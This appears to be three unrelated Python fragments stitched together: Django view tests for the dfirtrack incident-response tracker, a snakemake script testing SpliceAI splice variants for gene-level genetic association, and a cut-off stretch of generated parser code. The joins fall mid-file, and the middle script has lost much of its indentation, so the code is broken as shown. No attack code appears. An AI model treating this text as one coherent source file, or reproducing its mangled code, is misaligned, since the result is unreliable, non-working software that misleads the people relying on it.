self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertEqual(response.status_code, 200)
def test_system_list_template(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/system/system_list.html')
def test_system_list_get_user_context(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_system')
def test_system_list_redirect(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_system_list_context_with_api(self):
"""test list view"""
# add app to dfirtrack.settings
if 'dfirtrack_api' not in installed_apps:
installed_apps.append('dfirtrack_api')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertTrue(response.context['dfirtrack_api'])
def test_system_list_context_without_api(self):
"""test list view"""
# remove app from dfirtrack.settings
if 'dfirtrack_api' in installed_apps:
installed_apps.remove('dfirtrack_api')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertFalse(response.context['dfirtrack_api'])
def test_system_detail_not_logged_in(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# create url
destination = '/login/?next=' + urllib.parse.quote(
'/system/' + str(system_1.system_id) + '/', safe=''
)
# get response
response = self.client.get(
'/system/' + str(system_1.system_id) + '/', follow=True
)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_system_detail_logged_in(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_system_detail_template(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/system/system_detail.html')
def test_system_detail_get_user_context(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_system')
def test_system_detail_redirect(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# create url
destination = urllib.parse.quote(
'/system/' + str(system_1.system_id) + '/', safe='/'
)
# get response
response = self.client.get('/system/' + str(system_1.system_id), follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_system_detail_context_workflows(self):
"""test detail view"""
# add app to dfirtrack.settings
if 'dfirtrack_config' not in installed_apps:
installed_apps.append('dfirtrack_config')
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get(f'/system/{system_1.system_id}/')
# compare
self.assertEqual(str(response.context['workflows'][0]), 'workflow_1')
def test_system_detail_context_artifacts_all(self):
"""test detail view"""
# get objects
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['artifacts_all']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertTrue(
response.context['artifacts_all']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_all']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_all']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_all']), 2)
def test_system_detail_context_artifacts_open(self):
"""test detail view"""
# get objects
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['artifacts_open']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_open']), 1)
def test_system_detail_context_artifacts_closed(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertTrue(
response.context['artifacts_closed']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_closed']), 1)
def test_system_detail_context_tasks_all(self):
"""test detail view"""
# get objects
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_all']), 5)
def test_system_detail_context_tasks_open(self):
"""test detail view"""
# get objects
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_open']), 3)
def test_system_detail_context_tasks_closed(self):
"""test detail view"""
# get object
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_closed']), 2)
def test_system_detail_context_with_api(self):
"""test detail view"""
# add app to dfirtrack.settings
if 'dfirtrack_api' not in installed_apps:
installed_apps.append('dfirtrack_api')
# get object
system_1 = System.objects.get(system_name='system_1')
# login | |
import os
# os.environ["OMP_NUM_THREADS"] = "16"
import logging
logging.basicConfig(filename=snakemake.log[0], level=logging.INFO)
import pandas as pd
import numpy as np
# seak imports
from seak.data_loaders import intersect_ids, EnsemblVEPLoader, VariantLoaderSnpReader, CovariatesLoaderCSV
from seak.scoretest import ScoretestNoK
from seak.lrt import LRTnoK, pv_chi2mixture, fit_chi2mixture
from pysnptools.snpreader import Bed
import pickle
import sys
from util.association import BurdenLoaderHDF5
from util import Timer
class GotNone(Exception):
    """Signals that no usable variants are available for the current gene."""
# set up the covariatesloader: reads the phenotype column and the requested
# covariate columns from the tab-separated covariates/phenotypes files
covariatesloader = CovariatesLoaderCSV(snakemake.params.phenotype,
                                       snakemake.input.covariates_tsv,
                                       snakemake.params.covariate_column_names,
                                       sep='\t',
                                       path_to_phenotypes=snakemake.input.phenotypes_tsv)
# initialize the null models
# Y: phenotype, X: one-hot encoded covariates ('noK' = no kinship matrix)
Y, X = covariatesloader.get_one_hot_covariates_and_phenotype('noK')
null_model_score = ScoretestNoK(Y, X)  # null model for the score tests
null_model_lrt = LRTnoK(X, Y)          # null model for the likelihood-ratio tests
# set up function to filter variants:
def maf_filter(mac_report):
    """Load a minor-allele-count (MAC) report and return rows for variants
    passing the MAF/quality filters.

    Keeps variants that are observed (``Minor > 0``), have MAF below
    ``snakemake.params.max_maf`` and whose alternative allele is not more
    frequent than the reference. When ``snakemake.params.filter_highconfidence``
    is truthy, additionally restricts to variants flagged ``hiconf_reg``.

    :param mac_report: path to the tab-separated MAC report file
    :return: filtered report as a DataFrame indexed by variant id ('SNP')
    """
    # bugfix: 'hiconf_reg' was read below but missing from usecols, which made
    # the high-confidence branch raise AttributeError. Request it only when
    # needed, so files without the column still load in the default branch.
    usecols = ['SNP', 'MAF', 'Minor', 'alt_greater_ref']
    if snakemake.params.filter_highconfidence:
        usecols.append('hiconf_reg')
    # load the MAC report, keep only observed variants with MAF below threshold
    mac_report = pd.read_csv(mac_report, sep='\t', usecols=usecols)
    keep = (mac_report.MAF < snakemake.params.max_maf) & (mac_report.Minor > 0) & ~(mac_report.alt_greater_ref.astype(bool))
    if snakemake.params.filter_highconfidence:
        keep &= mac_report.hiconf_reg.astype(bool)
    vids = mac_report.SNP[keep]
    # high-confidence filtering of the annotation itself has already been
    # done in filter_variants.py
    return mac_report.set_index('SNP').loc[vids]
def get_regions(significance_threshold=1e-7):
    """Return the regions (genes) whose association p-values pass the
    significance threshold, or ``None`` when no gene does.

    Loads the association results and the regions BED file referenced by the
    snakemake object, keeps genes that are significant in any score- or
    LRT-based p-value column, and attaches coordinates, strand and the test
    statistics to each gene.

    :param significance_threshold: p-value cutoff applied to every
        ``pv_score_*`` and ``pv_lrt_*`` column (default 1e-7, the previously
        hard-coded value, so existing callers are unaffected)
    :return: DataFrame with one row per significant gene, or ``None``
    """
    # load the results table
    results = pd.read_csv(snakemake.input.results_tsv, sep='\t')

    # kernels may be given as a single string or a list of strings
    kern = snakemake.params.kernels
    if isinstance(kern, str):
        kern = [kern]

    pvcols_score = ['pv_score_' + k for k in kern]
    pvcols_lrt = ['pv_lrt_' + k for k in kern]
    statcols = ['lrtstat_' + k for k in kern]
    results = results[['gene', 'n_snp', 'cumMAC', 'nCarrier'] + statcols + pvcols_score + pvcols_lrt]

    # union of genes below threshold in any p-value column
    genes = [results.gene[results[k] < significance_threshold].values for k in pvcols_score + pvcols_lrt]
    genes = np.unique(np.concatenate(genes))
    if len(genes) == 0:
        return None

    # set up the regions to loop over for the chromosome
    regions = pd.read_csv(snakemake.input.regions_bed, sep='\t', header=None, usecols=[0, 1, 2, 3, 5], dtype={0: str, 1: np.int32, 2: np.int32, 3: str, 5: str})
    regions.columns = ['chrom', 'start', 'end', 'name', 'strand']
    regions['strand'] = regions.strand.map({'+': 'plus', '-': 'minus'})
    regions = regions.set_index('name').loc[genes]
    # attach the association statistics to each significant gene
    regions = regions.join(results.set_index('gene'), how='left').reset_index()
    return regions
# genotype path, vep-path:
assert len(snakemake.params.ids) == len (snakemake.input.bed), 'Error: length of chromosome IDs does not match length of genotype files'
# per-chromosome tuples: (id, genotype bed, spliceAI vep tsv, ensembl vep tsv,
# MAC report, LOF burden hdf5, LOF iid file, LOF gene-id file)
geno_vep = zip(snakemake.params.ids, snakemake.input.bed, snakemake.input.vep_tsv, snakemake.input.ensembl_vep_tsv, snakemake.input.mac_report, snakemake.input.h5_lof, snakemake.input.iid_lof, snakemake.input.gid_lof)
# get the top hits (genes passing the significance threshold)
regions_all = get_regions()
if regions_all is None:
    logging.info('No genes pass significance threshold, exiting.')
    sys.exit(0)
# where we store the results
stats = []
i_gene = 0
# enter the chromosome loop:
timer = Timer()
for i, (chromosome, bed, vep_tsv, ensembl_vep_tsv, mac_report, h5_lof, iid_lof, gid_lof) in enumerate(geno_vep):

    # skip chromosomes that contain no significant gene
    if chromosome.replace('chr','') not in regions_all.chrom.unique():
        continue

    # set up the ensembl vep loader for the chromosome
    # (spliceAI scores: DS_* = delta scores, DP_* = delta positions)
    spliceaidf = pd.read_csv(vep_tsv,
                             sep='\t',
                             usecols=['name', 'chrom', 'end', 'gene', 'max_effect', 'DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL'],
                             index_col='name')

    # get set of variants for the chromosome:
    mac_report = maf_filter(mac_report)
    filter_vids = mac_report.index.values

    # filter by MAF
    keep = intersect_ids(filter_vids, spliceaidf.index.values)
    spliceaidf = spliceaidf.loc[keep]
    spliceaidf.reset_index(inplace=True)

    # filter by impact:
    spliceaidf = spliceaidf[spliceaidf.max_effect >= snakemake.params.min_impact]

    # set up the regions to loop over for the chromosome
    regions = regions_all.copy()

    # discard all genes for which we don't have annotations
    gene_ids = regions.name.str.split('_', expand=True) # table with two columns, ensembl-id and gene-name
    regions['gene'] = gene_ids[1] # this is the gene name
    regions['ensembl_id'] = gene_ids[0]
    regions.set_index('gene', inplace=True)
    genes = intersect_ids(np.unique(regions.index.values), np.unique(spliceaidf.gene)) # intersection of gene names
    regions = regions.loc[genes].reset_index() # subsetting
    regions = regions.sort_values(['chrom', 'start', 'end'])

    # check if the variants are protein LOF variants, load the protein LOF variants:
    ensemblvepdf = pd.read_csv(ensembl_vep_tsv, sep='\t', usecols=['Uploaded_variation', 'Gene'])

    # this column will contain the gene names:
    genes = intersect_ids(np.unique(ensemblvepdf.Gene.values), regions.ensembl_id) # intersection of ensembl gene ids
    ensemblvepdf = ensemblvepdf.set_index('Gene').loc[genes].reset_index()
    ensemblvepdf['gene'] = gene_ids.set_index(0).loc[ensemblvepdf.Gene.values].values

    # set up the merge
    ensemblvepdf.drop(columns=['Gene'], inplace=True) # get rid of the ensembl ids, will use gene names instead
    ensemblvepdf.rename(columns={'Uploaded_variation': 'name'}, inplace=True)
    ensemblvepdf['is_plof'] = 1.
    ensemblvepdf = ensemblvepdf[~ensemblvepdf.duplicated()] # if multiple ensembl gene ids map to the same gene names, this prevents a crash.

    # we add a column to the dataframe indicating whether the variant is already annotated as protein loss of function by the ensembl variant effect predictor
    spliceaidf = pd.merge(spliceaidf, ensemblvepdf, on=['name', 'gene'], how='left', validate='one_to_one')
    spliceaidf['is_plof'] = spliceaidf['is_plof'].fillna(0.).astype(bool)

    # initialize the loader
    # Note: we use "end" here because the start + 1 = end, and we need 1-based coordinates (this would break if we had indels)
    eveploader = EnsemblVEPLoader(spliceaidf['name'], spliceaidf['chrom'].astype('str') + ':' + spliceaidf['end'].astype('str'), spliceaidf['gene'], data=spliceaidf[['max_effect', 'is_plof', 'DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL']].values)

    # set up the variant loader (splice variants) for the chromosome
    plinkloader = VariantLoaderSnpReader(Bed(bed, count_A1=True, num_threads=4))
    plinkloader.update_variants(eveploader.get_vids())
    plinkloader.update_individuals(covariatesloader.get_iids())

    # set up the protein LOF burden loader
    bloader_lof = BurdenLoaderHDF5(h5_lof, iid_lof, gid_lof)
    bloader_lof.update_individuals(covariatesloader.get_iids())

    # set up the splice genotype + vep loading function
    def get_splice(interval):
        """Load genotypes and SpliceAI annotations for the splice variants of a gene.

        :param interval: region row; 'name' is expected to be '<ensembl-id>_<gene-name>'
        :return: tuple (G1, vids, weights, ncarrier, cummac, is_plof, splice_preds_all)
        :raises GotNone: when the gene has no annotated splice variants
        """
        try:
            V1 = eveploader.anno_by_interval(interval, gene=interval['name'].split('_')[1])
        except KeyError:
            raise GotNone

        if V1.index.empty:
            raise GotNone

        vids = V1.index.get_level_values('vid')
        V1 = V1.droplevel(['gene'])

        # load genotypes; mean-center, then impute missing entries with 0 (= the mean)
        temp_genotypes, temp_vids = plinkloader.genotypes_by_id(vids, return_pos=False)

        temp_genotypes -= np.nanmean(temp_genotypes, axis=0)
        G1 = np.ma.masked_invalid(temp_genotypes).filled(0.)

        # carriers counted on the centered genotypes with a 0.5 cutoff
        # NOTE(review): assumes rare variants (mean close to 0) -- confirm for common ones
        ncarrier = np.sum(G1 > 0.5, axis=0)

        cummac = mac_report.loc[vids].Minor

        # spliceAI max score (first annotation column) used as variant weight
        weights = V1[0].values.astype(np.float64)

        # second annotation column: flag set when ensembl VEP already calls the variant protein-LOF
        is_plof = V1[1].values.astype(bool)

        splice_preds_all = V1.iloc[:,2:]
        splice_preds_all.columns = ['DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL']

        # "standardized" positions -> codon start positions
        # pos = V1[0].values.astype(np.int32)

        return G1, vids, weights, ncarrier, cummac, is_plof, splice_preds_all
# set up the protein-LOF loading function
def get_plof(interval):
try:
G2 = bloader_lof.genotypes_by_id(interval['name']).astype(np.float)
except KeyError:
G2 = None
return G2
# set up the test-function for a single gene
def test_gene(interval, seed):
pval_dict = {}
pval_dict['gene'] = interval['name']
called = []
def pv_score(GV):
pv = null_model_score.pv_alt_model(GV)
if pv < 0.:
pv = null_model_score.pv_alt_model(GV, method='saddle')
return pv
def call_score(GV, name, vids=None):
if name not in pval_dict:
pval_dict[name] = {}
called.append(name)
pval_dict[name] = {}
# single-marker p-values
pval_dict[name]['pv_score'] = np.array([pv_score(GV[:,i,np.newaxis]) for i in range(GV.shape[1])])
# single-marker coefficients
beta = [ null_model_score.coef(GV[:,i,np.newaxis]) for i in range(GV.shape[1]) ]
pval_dict[name]['beta'] = np.array([x['beta'][0,0] for x in beta])
pval_dict[name]['betaSd'] = np.array([np.sqrt(x['var_beta'][0,0]) for x in beta])
if vids is not None:
pval_dict[name]['vid'] = vids
def call_lrt(GV, name, vids=None):
if name not in pval_dict:
pval_dict[name] = {}
called.append(name)
# get gene parameters, test statistics and and single-marker regression weights
lik = null_model_lrt.altmodel(GV)
pval_dict[name]['nLL'] = lik['nLL']
pval_dict[name]['sigma2'] = lik['sigma2']
pval_dict[name]['lrtstat'] = lik['stat']
pval_dict[name]['h2'] = lik['h2']
logdelta = null_model_lrt.model1.find_log_delta(GV.shape[1])
pval_dict[name]['log_delta'] = logdelta['log_delta']
pval_dict[name]['coef_random'] = null_model_lrt.model1.getPosteriorWeights(logdelta['beta'], logdelta=logdelta['log_delta'])
if vids is not None:
pval_dict[name]['vid'] = vids
# load splice variants
G1, vids, weights, ncarrier, cummac, is_plof, splice_preds_all = get_splice(interval)
# keep indicates which variants are NOT "protein LOF" variants, i.e. variants already identified by the ensembl VEP
keep = ~is_plof
# these are common to all kernels
pval_dict['vid'] = vids
pval_dict['weights'] = weights
pval_dict['MAC'] = cummac
pval_dict['nCarrier'] = ncarrier
pval_dict['not_LOF'] = keep
for col in splice_preds_all.columns:
pval_dict[col] = splice_preds_all[col].values.astype(np.float32)
# single-variant p-values:
call_score(G1, 'variant_pvals') # single variant p-values and coefficients estimated independently
call_lrt(G1.dot(np.diag(np.sqrt(weights), k=0)), 'variant_pvals') # single variant coefficients estimated *jointly* after weighting
# sanity checks
assert len(vids) == interval['n_snp'], 'Error: number of variants does not match! expected: {} got: {}'.format(interval['n_snp'], len(vids))
assert cummac.sum() == interval['cumMAC'], 'Error: cumMAC does not match! expeced: {}, got: {}'.format(interval['cumMAC'], cummac.sum())
# do a score burden test (max weighted), this is different than the baseline!
G1_burden = np.max(np.where(G1 > 0.5, np.sqrt(weights), 0.), axis=1, keepdims=True)
call_score(G1_burden, 'linwb')
call_lrt(G1_burden, 'linwb')
# linear weighted kernel
G1 = G1.dot(np.diag(np.sqrt(weights), k=0))
# do a score test (linear weighted)
call_score(G1, 'linw', vids=vids)
call_lrt(G1, 'linw')
# load plof burden
G2 = get_plof(interval)
if G2 is not None:
call_score(G2, 'LOF')
call_lrt(G2, 'LOF')
if np.any(keep):
# merged (single variable)
G1_burden_mrg = np.maximum(G2, G1_burden)
call_score(G1_burden_mrg, 'linwb_mrgLOF')
call_lrt(G1_burden_mrg, 'linwb_mrgLOF')
# concatenated ( >= 2 variables)
# we separate out the ones that are already part of the protein LOF variants!
G1 = np.concatenate([G1[:, keep], G2], axis=1)
call_score(G1, 'linw_cLOF', vids=np.array(vids[keep].tolist() + [-1]))
call_lrt(G1, 'linw_cLOF')
else:
logging.info('All Splice-AI variants for gene {} where already identified by the Ensembl variant effect predictor'.format(interval['name']))
return pval_dict, called
    logging.info('loaders for chromosome {} initialized in {:.1f} seconds.'.format(chromosome, timer.check()))

    # run tests for all genes on the chromosome; genes without usable splice
    # variants raise GotNone inside test_gene and are skipped
    for _, region in regions.iterrows():

        try:
            gene_stats, called = test_gene(region, i_gene)
        except GotNone:
            continue

        # build the single-variant dataframe
single_var_columns = ['gene', 'vid', 'weights', 'MAC', 'nCarrier', 'not_LOF', 'DS_AG', 'DS_AL', | |
+ 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = self._actions.ignore(self._input, index1, self._offset, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['_'][index0] = (address0, self._offset)
return address0
    def _read_eol(self):
        """Parse the 'eol' grammar rule (generated PEG-parser code).

        Tries two alternatives at the current offset: (1) one or more
        comments (via _read_comment), or (2) one or more characters matching
        REGEX_4 ('[\\n\\r\\f]'), handed to self._actions.ignore. Results are
        memoized per input offset in self._cache['eol'].
        """
        address0, index0 = FAILURE, self._offset
        cached = self._cache['eol'].get(index0)
        if cached:
            # memoized: restore the offset recorded with the cached result
            self._offset = cached[1]
            return cached[0]
        index1 = self._offset
        # alternative 1: one or more comments
        remaining0, index2, elements0, address1 = 1, self._offset, [], True
        while address1 is not FAILURE:
            address1 = self._read_comment()
            if address1 is not FAILURE:
                elements0.append(address1)
                remaining0 -= 1
        if remaining0 <= 0:
            address0 = TreeNode(self._input[index2:self._offset], index2, elements0)
            self._offset = self._offset
        else:
            address0 = FAILURE
        if address0 is FAILURE:
            # alternative 1 failed: rewind and try alternative 2
            self._offset = index1
            # alternative 2: one or more newline-class characters
            remaining1, index3, elements1, address2 = 1, self._offset, [], True
            while address2 is not FAILURE:
                chunk0, max0 = None, self._offset + 1
                if max0 <= self._input_size:
                    chunk0 = self._input[self._offset:max0]
                if chunk0 is not None and Grammar.REGEX_4.search(chunk0):
                    address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
                    self._offset = self._offset + 1
                else:
                    address2 = FAILURE
                    # record the furthest failure position and what was expected there
                    if self._offset > self._failure:
                        self._failure = self._offset
                        self._expected = []
                    if self._offset == self._failure:
                        self._expected.append('[\\n\\r\\f]')
                if address2 is not FAILURE:
                    elements1.append(address2)
                    remaining1 -= 1
            if remaining1 <= 0:
                address0 = self._actions.ignore(self._input, index3, self._offset, elements1)
                self._offset = self._offset
            else:
                address0 = FAILURE
            if address0 is FAILURE:
                # both alternatives failed: rewind to the rule's start offset
                self._offset = index1
        self._cache['eol'][index0] = (address0, self._offset)
        return address0
def _read_keyword(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['keyword'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
index2, elements0 = self._offset, []
address1 = FAILURE
chunk0, max0 = None, self._offset + 5
if max0 <= self._input_size:
chunk0 = self._input[self._offset:max0]
if chunk0 == 'leave':
address1 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'leave\'')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index3 = self._offset
chunk1, max1 = None, self._offset + 1
if max1 <= self._input_size:
chunk1 = self._input[self._offset:max1]
if chunk1 is not None and Grammar.REGEX_5.search(chunk1):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index3
if address2 is FAILURE:
address2 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index2
else:
elements0 = None
self._offset = index2
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index2:self._offset], index2, elements0)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index4, elements1 = self._offset, []
address3 = FAILURE
